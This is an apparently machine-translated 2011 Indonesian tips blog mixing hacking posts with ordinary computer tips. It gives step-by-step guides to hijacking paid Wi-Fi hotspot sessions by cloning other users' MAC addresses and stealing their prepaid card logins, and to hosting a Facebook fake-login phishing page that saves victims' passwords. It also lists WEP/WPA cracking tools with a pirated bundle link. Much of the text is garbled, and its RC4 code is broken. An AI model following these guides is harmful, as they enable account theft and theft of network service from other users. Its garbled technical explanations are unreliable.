Pages
Saturday, May 21, 2011
Wifi Hacking Tuttorial
WEP is Wired Equivalent Privacy. This is an encryption standard for wireless until now. Many people do not even use WEP due to weak security, hassle, or WEP is pointless, because it can dicrack, although usually take a while to obtain enough data to get the WEP passwords, especially passwords are very long.
WEP consists of secret passwords and encryption. Secret password that is shared between access point and everyone in the wireless network, consisting of 5 or 13 characters. Used by the process of encryption for communications package that is disguised throughout the WLAN, or Wireless Local Area Network. All packages are unique and random, so if someone makes a crack in one package key, they can not see what others have done without cracking on them too.
This is all done using the secret password together with the three characters (the Initialization Vector, or IV) who were randomly selected by the wireless device. For example, if you are the password "hello", may make "abchello" to a package, and "xyzhello" for the other.
WEP also uses XOR, or Exclusive OR, for encryption. XOR compares two bits, and if theyre different, it will return 1. If not, it will return 0. For example, 1 XOR 1 will be 0, and 1 XOR 0 is 1.
Array is a variable that can hold multiple values. For example, an array of alphabet [26] will continue to value 26, which are labeled 0 through 25.
Example:
alphabet [0] = 'A';
alphabet [1] = 'B';
void swap (char & first, char & second)
{
char temp = first;
first = second;
second = temp;
}
swap (alphabet [0], alphabet [1]);
If the values array randomely have swapped many times, it can not be sent to the array element that holds the value.
The actual algorithm used by WEP to encrypt packets is RC4. RC4 consists of two steps: with a password and Scheduling Algorithm Pseudo Random Generation Algorithm. The first part, the scheduling algorithm is a password, or KSA, like this in C code, assuming k [] is an array of secret passwords:
int n = 256;
char s [n];
/ / Initialization
for (int i = 0; i <= (n - 1); i + +) s [i] = i; int j = 0; / / scrambling for (int l = 0, l <= (n - 1); l + + ) {j + = s [l] + k [l]; swap (s [l], s [j]);}
Let's examine the code above until we know that:
1. Integer 'n' determines how we make kuay encryption. Here using WEP 256.
2. Array of characters 'k' is the secret password in combination with three fake character. This does not change at all in this program.
3. The '/ / Initialize' only represents the initialization, as much as the characters 0-255.
4. Integer 'j' is used to hold value during scrambling. Always initialized to 0, because it must always be in the range 0.
5. Furthermore, (where '/ / scrambling') scrambling process begins. Basically, will result in 's' array 'random' than ever before 's' specified array.
6. Inside the circle, which merges their first passwords (k) with a random array (s) to create a complete character. Then, the call to swap () puts into an array of characters is completed.
Now it's time for the second part of the RC4 algorithm, then the Pseudo Random Generation Algorithm (PRGA). This section of the output stream passwords based on KSA's pseudo-random array. This key stream will be merged with cleartext data to create the encrypted data.
int i = 0;
int j = 0;
int z;
while (data_disini)
Friday, May 20, 2011
Trick Eliminates waiting time 4shared and rapidshare
Okay go directly to the heart of the matter, we are now going to do a little trick on how to eliminate waiting time in 4shared or in rapidshared,
1. The first step is to copy the text below
"javascript: alert (c = 0)"
2. paste it into your web bar, here I am using Mozilla Firefox 6
3. when you finish, open your web browser and navigate url to 4shared or rapidshare
4. Choose a free user account, it will display a timer to wait for the download link
5 In As time goes on, click book mark yangkita java script created earlier, then the window will appear (ignore it) and click OK,
6. yes, waiting time will be lost
7. make coffee while waiting for the files that we downloaded earlier:)
1. The first step is to copy the text below
"javascript: alert (c = 0)"
2. paste it into your web bar, here I am using Mozilla Firefox 6
3. when you finish, open your web browser and navigate url to 4shared or rapidshare
4. Choose a free user account, it will display a timer to wait for the download link
5 In As time goes on, click book mark yangkita java script created earlier, then the window will appear (ignore it) and click OK,
6. yes, waiting time will be lost
7. make coffee while waiting for the files that we downloaded earlier:)
Pengumuman
Dengan beberapa pertimbangan, mulai kali ini blog ini menggunakan bahasa inggris (walau cuma translate :) hhee,,) mohon maklum para pengunjung sekalian. Terimakasih..
Thursday, May 19, 2011
Google Panda Update, SEO Changing How it Works
The topic of SEO is becoming a hot issue that discussed the current crowded. If you are looking for the topic of SEO in Google, you'll find at least 576 million search results and 16 million search results for topic "SEO marketing." SEO is a very profitable business. Business is based on optimizing a website on Search Engine offers a huge advantage and profitable for the perpetrators. But what would happen if search engines change their algorithms at least a matrix or to the search results that they want to display? Recently Google did by issuing a "Panda Update". It can filter the blog, traffic generation, online marketing blog that has content that is often disturbing farm seekers in cyberspace. Content Farm is also often regarded as an endless content, and therefore Google blocks some sites that contain content and UGC AGC them.
These changes will improve the quality of generated by Google searches, mainly to avoid spam and content content endless earlier. But it is definitely become a major obstacle for SEO, given the base of this company is in search engines. So what should be done by the SEO business? Here's an interview with Ramon Ray, Smallbiztechnology.com.
What do you do when any such changes?
At that time I immediately called and asked Andrew Cross and Daniel Laloggia, Search Marketing Mgr. of Walker Sands Communications, a firm of public relations, marketing and web design agency from Chicago on this issue.
Is this Google's changes made an impact on other industries in addition to SEO?
Seems like no other company affected by this change. Actually this is just how does Google make changes to the system during this search that they do.
So what should be done by the SEO business? Do contact Google and lodge a protest or change their SEO system? Or both?
Protested to Google is not an idea that solutif, may now be better SEO change and adapt with the existing system on Google so that their business is still running.
Can we predict whether a change like this will happen again next?
Google is always doing several times a year. Changes in these systems can be very basic and a bit with a different impact.
True, Google often make changes such as updating the current Panda. John Mc Phee from formic Media Inc., a social media marketing company said that the most important for the company SEO is backlinks. Backlinks are a "vote of confidence" online for a site in cyberspace. With this vote of confidence earlier, search engines will not block these sites.
According to him, there are two types of sites that is off-site and on-linking. On Linking is what connects the site with your weblink. Such sites will be deleted or blocked by Panda update this. Therefore, for the site to avoid a block Panda, John suggested that doing the following:
Your site listing, and listing some of the low-quality sites and make sure there is no link to your site such low quality site.Create backlinks for your site, very helpful to not get blocked by Google PandaContinue by creating attractive content on your site.Social media. Optimalisasikan social media like Facebook, Twitter and others. Because now people prefer to communicate through such social media. And you can use it to include links in social media.
To get some other guides on Google Panda is, how to improve SEO, how to be SEO-Friendly Panda and how Google likes your site? Please visit the Wordtracker.com.
source: http://seokita.com/google-panda-update-merubah-cara-kerja-seo.html
Labels:
Google Panda,
SEO
Monday, May 16, 2011
Steal Bandwidth with Mozilla Firefox
Upset, certainly if it is too long to wait for loading in the cafe, one, more expensive Internet cafeBecause it is EACH cubicle / room already in limiting the bitrate n bandwidth.okay, all roads lead to Rome, the many Ways We play suck up bandwidth for,, HHE. ...
well now That problem has been resolved ...
how:
1). Open Mozilla Firefox ...
2). In the Address Bar type: ABOUT: CONFIG
3). Search string below: (make sure all srting unders "TRUE")
replace example:
NETWORK.HTTP.PIPELINING FALSE ==> right click and select "Toggle"
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
Network.http.proxy.pipelining TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== This must be False
4). create a new srting how: Click the Left 1X Anywhere, Right click NEW>> INTEGER
5). Type: Rate nglayout.initialpaint.delay
6). Then REFRESH or F5
7). In the Address Bar type: ABOUT: BLANK.
Click Menu:For OS of Windows XP TOOLS> OPTIONS>> WEB FEATURESFor OS Linux (Vector) EDIT>> PREFERENCES
For different settings on installments OS EDIT>> ADVANCED9).
In Option:ALLOW WEB SITES TO INSTALL SOFTWARE
Give Signs Check Box To activate
10). Then Press OK Then REFRESH (F5)
11). Go To Link It:https: / / addons.mozilla.org / extensions / moreinfo.php? applicationfiltered = firefox & id = 125
or:
https: / / addons.mozilla.org / extensions / moreinfo.php? id = 125 & applicationfiltered = firefox
12). Download Software SwitchProxy Tool Version 1.3.4
13). After the Finish Do not Press the Button UPDATE
14). Click the sign of X (cap) What's In The Upper Right Corner Of POP UP Window Appears
15). Close All Browsers Mozilla FireFox,
16). Then Open Again To Switch Software SwitchProxy Tool Version 1.3.4 What's the last Install
17). If Installation Success, Will Appear Under additional Toolbar Navigation Toolbar & Address Bar.
18). Mozilla Browser Now Ready To Use ... ....
:: NOTE::- Software SwitchProxy Tool Version 1.3.4 This is in Addition to Proxy Automatically Changing the Mozilla FireFox browser, it Also Engine Impact of Internet Connection Speed
- How It's Very Effective When Used On Solid Online Warnet for sucking Bandwidth (Majority speed Internet access)
Go to Who's Your Computer Use- Significant Changes That occurred In Internet connections with Broadband / VSAT
Well how?
Are there any changes on your internet speed?
Once again, I am not Responsible if there is' Things That Are not in Want,,,
Source: www.imam77.co.cc
well now That problem has been resolved ...
how:
1). Open Mozilla Firefox ...
2). In the Address Bar type: ABOUT: CONFIG
3). Search string below: (make sure all srting unders "TRUE")
replace example:
NETWORK.HTTP.PIPELINING FALSE ==> right click and select "Toggle"
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
Network.http.proxy.pipelining TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== This must be False
4). create a new srting how: Click the Left 1X Anywhere, Right click NEW>> INTEGER
5). Type: Rate nglayout.initialpaint.delay
6). Then REFRESH or F5
7). In the Address Bar type: ABOUT: BLANK.
Click Menu:For OS of Windows XP TOOLS> OPTIONS>> WEB FEATURESFor OS Linux (Vector) EDIT>> PREFERENCES
For different settings on installments OS EDIT>> ADVANCED9).
In Option:ALLOW WEB SITES TO INSTALL SOFTWARE
Give Signs Check Box To activate
10). Then Press OK Then REFRESH (F5)
11). Go To Link It:https: / / addons.mozilla.org / extensions / moreinfo.php? applicationfiltered = firefox & id = 125
or:
https: / / addons.mozilla.org / extensions / moreinfo.php? id = 125 & applicationfiltered = firefox
12). Download Software SwitchProxy Tool Version 1.3.4
13). After the Finish Do not Press the Button UPDATE
14). Click the sign of X (cap) What's In The Upper Right Corner Of POP UP Window Appears
15). Close All Browsers Mozilla FireFox,
16). Then Open Again To Switch Software SwitchProxy Tool Version 1.3.4 What's the last Install
17). If Installation Success, Will Appear Under additional Toolbar Navigation Toolbar & Address Bar.
18). Mozilla Browser Now Ready To Use ... ....
:: NOTE::- Software SwitchProxy Tool Version 1.3.4 This is in Addition to Proxy Automatically Changing the Mozilla FireFox browser, it Also Engine Impact of Internet Connection Speed
- How It's Very Effective When Used On Solid Online Warnet for sucking Bandwidth (Majority speed Internet access)
Go to Who's Your Computer Use- Significant Changes That occurred In Internet connections with Broadband / VSAT
Well how?
Are there any changes on your internet speed?
Once again, I am not Responsible if there is' Things That Are not in Want,,,
Source: www.imam77.co.cc
Labels:
Hacking,
Mozilla Firefox
Breaking into the Hotspot network access mode
For this paper to study computer science rather than willing to give advice well, but only as a lesson wrote the way to break into the network hotspots and wireles internet cafe can you catch being OK.This trick can also be use to find a password that is used by someone in the venom hotspot access using prepaid cards or a member of a cafe Lho! note well yes!
Simple tool that prepared hell wrote:
- A set Laptop: Pc who got wireless is fine, as long as hotspotnya nyampek network.- Laptop Charger: for surely takes a lot of battery power when the Internet craze.
Software required:
1. AngryIP Scanner (108 kb): This software for scanning mac address ip and find victims. Software search in google aja kok small size. Stay put aliases do not need installation.
2. Mac Address Chager (312 kb): this software to change the mac address dipergunkan us. Mac Address? Explain the importance not need to be makeknya, ngeti uncertain as we go along. (From the street not far "^_^"). Please search on google.
Jump now to the way he wrote:
1. Find the location of the hotspot service provider, certainly in areas that are affordable hotspot network.
2. Turn on your laptop, and also turn on your wireless network and see the wireless network system tray icon, then right click and select view avalible wireless network, and of course after that you must connect to a wireless hotspot is your destination.
3. After the connect, right click the system tray and select status> choose details tab> look there ip given to us. Write down the ip is.
4. Open Courses AngryIP Scanner and enter the ip range that we will scan (using the data we had ip) at the top. For example: the IP that we can xxx.xxx.x.xx kemuadian enter the ip in the first column of our range in accordance with the ip that earlier but replace the number at the end with 1 to xxx.xxx.x.1 and in the second column write the same but the figures one end was replace with 255 to xxx.xxx.x.255. results xxx.xxx.x.1 to xxx.xxx.x.255 and click start (red button).
5. After the scan then we will get a live ip data connected with these hotspots. after scanning is complete then see the ip of the living (alive hosts) blue right click on the live ip ip Right-click on the blue color was right click> show> mac address and there will be code mac address (sometimes there are mac addresses are not displayed, select Just another ip). Write down the mac address that we get.
6. Open the Mac Address Changer program we have prepared. There is a mac address field. nah now lives change mac address with which we got earlier and press change mac id.
7. Wait for our mac aan replaced and temporary connection and connect again automatically disconnected itself.
8. Log in firefox web browser or whatever may. Enjoy Free Internet ...
One thing to remember is that we ride the system of data transfer on our account was hacked (which have the ip before, sorry ...). If I still usually to outsmart is to enter the hotspot login status page (in order to accounts). eg idonbiu.hotspot.net / status and so go there it looks prepaid card code number and we note only, then logout and log back in to the hotspot login page that quickly enter the password earlier. This will make us directly to access the Internet without a ride again (because that make it our prepaid card code) so if anyone wants to login to use the card (which has a code) when you log in using the card of course he would not be able to enter because cardnya prepaid cards "already logged".
How is, interesting is not it?
But I suggest, as I do is to ride alone, because I do not want to go too far, like the way that I beritau to log off and log in again certainly will make the owner can not log in.. Kasian right?
So while already dikasi free, why not ride it, yes, it was counted cuman follow-up with my ngakses'm not too harmful. Request permission to direct also the possibility that had not refused, so long as interests are indeed urgent.
For Ip Sacanning I can also use the application dude to know the condition of the computers connection to the hotspot. Can be tried is also yes.
Once again, all this just for the learning course, as long as we are still capable of why not use the legal aja. And this can also be used by the hotspot owner, if this method can still be used to break into. So needless security lebihTongueTop ...
source: www.imam77.co.cc
Tools for hacking wifi
The following are some tools to break into wireless networks.just ..
WIRELESS HACKING TOOL
NetStumbler
Netstumbler known as Network Stumbleris a means of detecting acilitates Wireless Wireless LANs using 802.11b, 802.11a and 802.11g WLAN standard that runs on Microsoft operating systems from Win98 - Win Vista, there is also another version called Mini Stumbler Anothere that uses the operating system Windows CE. For tool "that can be on the handheld.
You can get it here
Aircrack
Fastest to WEP / WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. This can be done within 40 to 512-bit WEP password is encrypted and only once the package "has been collected. Aircrack can also attack WPA 1 or 2 networks using advanced cryptographic methods rude or pushy. The suite includes airodump (an 802.11 packet maker program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP / WPA for decision-file).
You can get here Aircrack
AirSnort
802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool which is used to recover encryption passwords. It was developed by the shmoo group of passive and operated by monitoring transmissions, computing encrypted passwords will be done if the package has been collected. You may also be interested in this AirSnort.
You can get here AirSnort
Cowpatty
Cowpatty this is a good tool for cracking WPA-PSK force, which is considered "New WEP" for Wireless Home Security. This program simply tries a bunch of different options from a dictionary file to see and discover what is defined as Pre-Shared Key.
You can get here Cowpatty
Asleap
This tool is very good when using the network Leap. This tool can be used to gather the authentication data that is being passed in the network, and this can be sniffed, so be on crack. Leap does not protect the authentication like other "real" EAP, which is the main reason why Leap can be easily damaged.
You can get here Leap
Ethereal
Ethereal is used by the whole world Wind0s by both operating systems and open source, which is used for troubleshooting, analysis, and protocol software development, and education. Has all the standard features that would be expected in protocol analysis, and several features not seen in every product. Open-source license allows the addition of enhancements for those of you "who have the expertise. Good loh .. Try: D
You can download Ethereal here
Others:
AiO Wireless Hack Tools 2009:
• NetStumbler 0.4.0
• Kismet 2005 2008 R
• Wellenreiter v1.9
• WEP Crack 0.1.0
• AirSnort 0.2.7e
• Wepwedgie 0.1.0 alpha
• Hotspotter 0.4 Information Files:
Name: AIO Wireless Hack Tools 2009 Full
Size: 8.1 MB (recovery register 1%)
Language: Bahasa Indonesia
Support Platform: Linux, Windows.
Format: RAR
Downloadfile:
DL Link:
http://rapidshare.com/files/151930205/AIO_WHT2009_-_ErFeX__AiO.ProgramasFull.CoM.rar/
WIRELESS HACKING TOOL
NetStumbler
Netstumbler known as Network Stumbleris a means of detecting acilitates Wireless Wireless LANs using 802.11b, 802.11a and 802.11g WLAN standard that runs on Microsoft operating systems from Win98 - Win Vista, there is also another version called Mini Stumbler Anothere that uses the operating system Windows CE. For tool "that can be on the handheld.
You can get it here
Aircrack
Fastest to WEP / WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. This can be done within 40 to 512-bit WEP password is encrypted and only once the package "has been collected. Aircrack can also attack WPA 1 or 2 networks using advanced cryptographic methods rude or pushy. The suite includes airodump (an 802.11 packet maker program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP / WPA for decision-file).
You can get here Aircrack
AirSnort
802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool which is used to recover encryption passwords. It was developed by the shmoo group of passive and operated by monitoring transmissions, computing encrypted passwords will be done if the package has been collected. You may also be interested in this AirSnort.
You can get here AirSnort
Cowpatty
Cowpatty this is a good tool for cracking WPA-PSK force, which is considered "New WEP" for Wireless Home Security. This program simply tries a bunch of different options from a dictionary file to see and discover what is defined as Pre-Shared Key.
You can get here Cowpatty
Asleap
This tool is very good when using the network Leap. This tool can be used to gather the authentication data that is being passed in the network, and this can be sniffed, so be on crack. Leap does not protect the authentication like other "real" EAP, which is the main reason why Leap can be easily damaged.
You can get here Leap
Ethereal
Ethereal is used by the whole world Wind0s by both operating systems and open source, which is used for troubleshooting, analysis, and protocol software development, and education. Has all the standard features that would be expected in protocol analysis, and several features not seen in every product. Open-source license allows the addition of enhancements for those of you "who have the expertise. Good loh .. Try: D
You can download Ethereal here
Others:
AiO Wireless Hack Tools 2009:
• NetStumbler 0.4.0
• Kismet 2005 2008 R
• Wellenreiter v1.9
• WEP Crack 0.1.0
• AirSnort 0.2.7e
• Wepwedgie 0.1.0 alpha
• Hotspotter 0.4 Information Files:
Name: AIO Wireless Hack Tools 2009 Full
Size: 8.1 MB (recovery register 1%)
Language: Bahasa Indonesia
Support Platform: Linux, Windows.
Format: RAR
Downloadfile:
DL Link:
http://rapidshare.com/files/151930205/AIO_WHT2009_-_ErFeX__AiO.ProgramasFull.CoM.rar/
How to Password Breaking Hotspot With K-MAC
Breaking into Password mode HotSpot As we know, hotspots or places with standard Wireless Internet access 802.11b / g has no foreign goods more ears to us, and when we travel in public places like the Mall, Cafe, hotels and offices, we easily find the facility .Unfortunately not all service providers offer wireless Internet facilities for free, or even if free, is very limited. One of the protection used by wireless service providers is to restrict Internet access based on MAC Address.
What is MAC Address? In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs). Okay so the conclusion MAC Address is a unique number that distinguishes each network device attached to our computer. An example is the hotspot in the Food Court Plaza Semanggi. At the Plasa Semanggi HOTSPOT foodcourt, the Wireless Internet service providers, limiting the use of the Internet for free only for 3 hours, after that you can not access the internet again, and will be able to access again tomorrow.
Type of protection used is MAC Address Filtering. How to break through the protection with a MAC Address? There is a very useful tool for you.
Tools was named K-MAC you can download it below ...
Next will be described on how to change the MAC address using the k-mac First run the program k-mac if you do not have please download. Next Change MAC into what and how much? (Code used "1-0" & "AF") hexadecimal 1.
With this tool you will be able to change your MAC-Address in an instant and what does it mean? You can break the MAC Address Protection! Each share of Internet access you run out in 3 hours, which you need to do is change your MAC address, and do the connection again Then what if the Wireless access is made with other protection? Such as WEP and WPA/WPA2 Keys Keys? I will discuss it next time Free Happy Surfing!
source: www.komputer1.com
How to Restore Deleted Files
Never delete important files on your computer by mistake? Cases like this may never happen to you, sometimes it happens because we are in a hurry or being chased time.
.
But do not worry, you can use special tools to restore the files. Here are four tools that you can use to restore deleted files. Tools can be downloaded for free on the internet.
.
1. Undelete Plus
Among the free applications are available in superficial to restore deleted files, Undelete Plus one that can be used. User interface (interface) are very simple. You can restore deleted files with ease in accordance with the type of file, such as Application, GIF graphics, HTML Docs, PDF.
These tools operate on Windows 95 operating system, Windows 98, Windows Me, Windows NT, Windows 2000, Windows XP, Windows 2003 and Windows Vista. You can download Undelete Plus: http://www.undelete-plus.com/
2. Restoration
Restoration is one of the application to restore deleted files. Tools are also very easy to use and does not need to be installed on the computer. Simply download such tools at: http://www.snapfiles.com/get/restoration.html, and run its executable file to restore deleted files.
3. PC Inspector File Recovery
Although the user interface PC inspector File Recovery is not so user friendly, the application is considered to be very powerful to detect and restore deleted files. After the scanning process, will be presented the files that were deleted in the folder tree structure (tree structure) to facilitate the search. That way, you can easily search and select files / folders that were deleted, then click the icon "save" to restore the file. Tools can be downloaded at: http://www.pcinspector.de/Sites/file_recovery/info.htm?language=1
4. Recuva
Recuva is often referred to as "Recover". The user interface is very simple. In basic mode, this tool will display a list of files that were deleted can be restored. If you switch to advanced mode, then reset the scanning process will be done and show options to display information contains a list of the files that were deleted. Tools can be downloaded at: http://www.recuva.com/
* Please try ... ...
source: 2lisan.com
Labels:
Recovery
How To Hacking up with a fake login
Up many, many people use it in Indonesia until ribuanpun.
Just facebook almost forbidden.
today I posted about how to create fake login on facebook.
.
just okay.
.
1. please list in http://www.700megs.com
why I tell you the list there?
in there is free web hosting support php and also than in ripway.com
if you can not just go directly registered at:
http://www.700megs.com/register.jsp
2. after you successfully register in 700megs.com go to FILE MANAGER ... delete the index.html file. (will bein Cpanel masing2 later )
3. okay, we start our practice.
needed is the file index.php and write.php as core fakelogin
please download the script here or in advance
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
size only 9KB.
4. after you download. There are two index files and write you name it
both of you please upload the 700megs.com that you'd have a list.
5. Last test before you upload index.php washed and login from there,
klo successfully .. there will be a new file; Password.txt [intended as a place where userid and password that will be accommodated on facebook fakelogin ye]
6, alright! finished up here. . .
For distribution please with how masing2 ...
source: 2lisan.com
How to Fix Damaged Flashdisk
For those of you who are experiencing problems with flash, in particular the case of flash is detected in Windows but not in a format you can use some of the following ways to fix it:
.
Format flash through Linux / Linux LiveCD
(Original page: http://linux.or.id/node/2835/)
.
Steps should be taken:
.
1. Boot the computer using a Linux LiveCD, Slax KillBill eg, Knoppix or other distributions,
2. After logging into the system, enter the flash that had troubled to any USB port. For the sake of data security, make sure that only the troubled flash are installed,
3. Make sure your flash is detected, or at least led indicator flame,
4. Go to console
5. In the console run cfdisk / dev/sda1 (adjust the flash to how that is attached),
6. Delete or remove a partition on the flash,
7. Create a new partition by selecting Create New | Write,
8. Save the changes you've just done,
9. Format flash mkfs.vfat by typing command-f32 / dev/sda1 on the console.
10. Your flash has a new partition, so that it can be reused either in Linux or in Windows.
Format USB flash Using Disk Storage Format Tool
In addition to the above, you can also use the tools that are issued by third parties. One of them is Hewlett Packard (HP). Although this tool released by HP, but utilization can also be used to flash other brands.
The following steps do not fix the flash that can be formatted using the HP USB Disk Storage Format Tool:
1. Download the HP USB Disk Storage Format Tool here,
2. Install the application, recommendations OS used is Microsoft Windows 2000, Windows 2003 Server and Novel Netware,
3. Enter the flash is problematic to any USB port. Make sure your flash drive is detected and received allocations on Windows,
4. Run the application of the HP USB Disk Storage Format Tool
5. Specify the drive where the flash is mounted,
6. Select Create New or Replace Existing Configuration to create a new partition and erase the existing configuration in the flash,
7. Format your flash in accordance with the desired file system.
Good luck, hopefully useful.
Source: 2lisan.com
.
Format flash through Linux / Linux LiveCD
(Original page: http://linux.or.id/node/2835/)
.
Steps should be taken:
.
1. Boot the computer using a Linux LiveCD, Slax KillBill eg, Knoppix or other distributions,
2. After logging into the system, enter the flash that had troubled to any USB port. For the sake of data security, make sure that only the troubled flash are installed,
3. Make sure your flash is detected, or at least led indicator flame,
4. Go to console
5. In the console run cfdisk / dev/sda1 (adjust the flash to how that is attached),
6. Delete or remove a partition on the flash,
7. Create a new partition by selecting Create New | Write,
8. Save the changes you've just done,
9. Format flash mkfs.vfat by typing command-f32 / dev/sda1 on the console.
10. Your flash has a new partition, so that it can be reused either in Linux or in Windows.
Format USB flash Using Disk Storage Format Tool
In addition to the above, you can also use the tools that are issued by third parties. One of them is Hewlett Packard (HP). Although this tool released by HP, but utilization can also be used to flash other brands.
The following steps do not fix the flash that can be formatted using the HP USB Disk Storage Format Tool:
1. Download the HP USB Disk Storage Format Tool here,
2. Install the application, recommendations OS used is Microsoft Windows 2000, Windows 2003 Server and Novel Netware,
3. Enter the flash is problematic to any USB port. Make sure your flash drive is detected and received allocations on Windows,
4. Run the application of the HP USB Disk Storage Format Tool
5. Specify the drive where the flash is mounted,
6. Select Create New or Replace Existing Configuration to create a new partition and erase the existing configuration in the flash,
7. Format your flash in accordance with the desired file system.
Good luck, hopefully useful.
Source: 2lisan.com
Labels:
Flashdisk
Pembajakan Account Facebook dan Cara Mencegahnya
Some media reported today about the theft of facebook user account passwords in several places both in Indonesia and abroad. The victims were admitted after log out last time and the next day trying to log in to access failed for several reasons such as "username and password do not match" or "account does not exist".
.
In some other social networking, like twitter and plurk had reported a similar incident never happened. Username and password do not match suddenly due to any reason, or we can take the red yarn, which change their password there.
.
Is there a cracking technique to break into facebook accounts between individuals? The answers are few. Then the next question is, is there a technique to disable an account facebook or other social networking?
Techniques that are revealed to attack your facebook account some time ago is to flood the data on a server or facebook with DDOS technique commonly known as distributed denial of service so that the server was paralyzed for several hours as it did on facebook and twitter in 2009 by a cracker from Russia. The possibility of this kind we need to beware.
* Keylogger *
The first way to use keylogger is a very effective way for the cracker to steal passwords from your facebook account. By installing the software and or hardware keylogger on the target notebook or PC, then automatically all forms of tapping on the keyboard or your browsing activities will be recorded in detail and systematically.
So if you type the password and username on a notebook or a PC that already has a keylogger, your full compliance with the liver had submitted such sensitive personal data on people who put it, because the keylogger is like carbon paper which will make copies of something written on it.
Keyloggers are usually installed by crackers on the public internet access terminals sharing the same like in the cafe and campus. So be careful when using this access.
1. First, do not immediately use the terminal but did restart.
2. Second, check whether there is a hidden application that runs in the background memory, you can use the tools event task manager (press ctrl + alt + del on your windows desktop) and see if there is an application or process that is unusual? Indeed you need a bit to learn and get used to this for your own safety.
3. Third, check the security settings on your browser does automatically record the username and password? You should turn off this feature and if there are anti-phishing features of the site can be activated.
4. Fourth, clear / delete cache and history are automatically every time you close the browser. This you can do in your browser settings.
5. Fifth, make sure that every completion of the activities you always log out completely.
How to Accelerate Download Download How To Speed Up Download
.
QOS which stands for 'Quality of Service' is provided in order to ensure your network works well. But the truth is not so useful but certainly it can take up to 20% of your bandwidth. You can try and see the difference when QoS is disabled.
For those of you who use Windows XP Professional, the following steps to turn off QoS:
.
* Click Start, then Run.
* Type "gpedit.msc" in the text box and press enter. (If you can not just continue k no. 2)
* In the Local Computer Policy, click the plus sign on Computer Configuration, then click again on Administrative Templates.
* Click the plus sign on Network and select QoS Packet Scheduler.
* On the right side of the box, double-click on Limit Reservable Bandwidth.
* On the Settings tab, select Enabled.
* In the Bandwidth limit%, change it to 0%. (Do not leave empty its contents)
* Click OK.
But for those of you who use Windows Home Edition, follow these steps:
.
* Click Start and then select Settings.
* Select Control Panel, and open the Network Connections
* Right click on Local Area Connection and select Properties.
* On the General tab, missing a check in the QoS.
For the second way is a special setting in Firefox 3.0
Many people using this application, but do you know how to improve browsing capabilities Firefox-3.0, all it takes a little extra setting arrangements. Here are tips for doubling the speed of the browser Mozilla Firefox.
1. Firefox-3.0 Enable your browser and type the command "about: config" (without quotation marks), in the address bar.
2. You will be taken to the configuration page Firefox-3.0. If there is a warning to be careful changing the settings on the page, just click yes or ok.
3. In the filter search bar on the configuration page, type "network.http.pipelining". Make sure valuenya is set with value "true". If there is still "false", double click to make it "true".
4. Back to the filter search bar, type "network.http.pipelining.maxrequests". Double click on this option and change its value (value) to 8.
5. Back to the filter search bar, type "network.http.proxy.pipelining", double click to change valuenya become 'true'.
6. Back to the filter search bar, type "network.dns.disableIPv6". Double click to change the value to 'true'.
7. Right-click anywhere on the configuration page is up, select New -> Boolean. Type "content.interrupt.parsing" in the popup windows that appear and then click OK. When prompted for a choice appears, select 'true'.
8. Back right-click a configuration page, select New -> Integer. Type "content.max.tokenizing.time". At the prompt value that appears enter the value 2250000.
9. Back right-click a configuration page, select New -> Integer. Type "content.notify.interval". Enter the value 750 000 at the prompt that appears.
10. Back right-click a configuration page, select New -> Boolean. Type "content.notify.ontimer". Select 'true' value for the field prompt that appears.
11. Back right-click a configuration page, select New -> Integer. Type "content.notify.backoffcount". At the prompt value that appears fill in the value '5 '.
12. Back right-click a configuration page, select New -> Integer. Type "content.switch.threshold". Fill in the value of an integer value 750 000 at the prompt that appears.
13. back right click on the configuration page, select New -> Integer. Type "nglayout.initialpaint.delay". Enter the value '0 'at the prompt field value that appears.
14. aja nyantae again!! hehe
DO NOT FORGET TO HIS restart Firefox.
For the third mode: Meng-optimized TCP / IP Stack your
1. Download the file by clicking here
2. Run the program.
3. When the program path, setting it is setting your PC today. Write down your current settings. So if changes are not as you wish, you can reverse like its original state and reboot.
Immediately, you practice and feel the ability and the speed of Firefox-3.0 belongs to you, more cepatkan?, If there is no change to use the third way! This old trick just try it can still be said to know ..
Source: hadipurnama.wordpress.com
Cara Mengenal Hacking Wireless/WiFi/Hotspot dan Triknya
Wi-Fi (Wireless Fidelity)
Wi-Fi (Wireless Fidelity) adalah koneksi tanpa kabel seperti handphone dengan mempergunakan teknologi radio sehingga pemakainya dapat mentransfer data dengan cepat. Wi-Fi tidak hanya dapat digunakan untuk mengakses internet, Wi-Fi juga dapat digunakan untuk membuat jaringan tanpa kabel di perusahaan. Karena itu banyak orang mengasosiasikan Wi-Fi dengan “Kebebasan” karena teknologi Wi-Fi memberikan kebebasan kepada pemakainya untuk mengakses internet atau mentransfer data dari ruang meeting, kamar hotel, kampus, dan café-café yang bertanda “Wi-Fi Hot Spot”.
Awalnya Wi-Fi ditujukan untuk pengunaan perangkat nirkabel dan Jaringan Area Lokal (LAN), namun saat ini lebih banyak digunakan untuk mengakses internet. Hal ini memungkinan seseorang dengan komputer dengan kartu nirkabel (wireless card) atau personal digital assistant (PDA) untuk terhubung dengan internet dengan menggunakan titik akses (atau dikenal dengan hotspot) terdekat.
Spesifikasi
Wi-Fi dirancang berdasarkan spesifikasi IEEE 802.11. Sekarang ini ada empat variasi dari 802.11, yaitu: 802.11a, 802.11b, 802.11g, and 802.11n. Spesifikasi b merupakan produk pertama Wi-Fi. Variasi g dan n merupakan salah satu produk yang memiliki penjualan terbanyak pada 2005.
Spesifikasi Wi-Fi | ||||
Spesifikasi | Kecepatan | Frekuensi Band | Cocok dengan | |
802.11b | 11 Mb/s | 2.4 GHz | B | |
802.11a | 54 Mb/s | 5 GHz | A | |
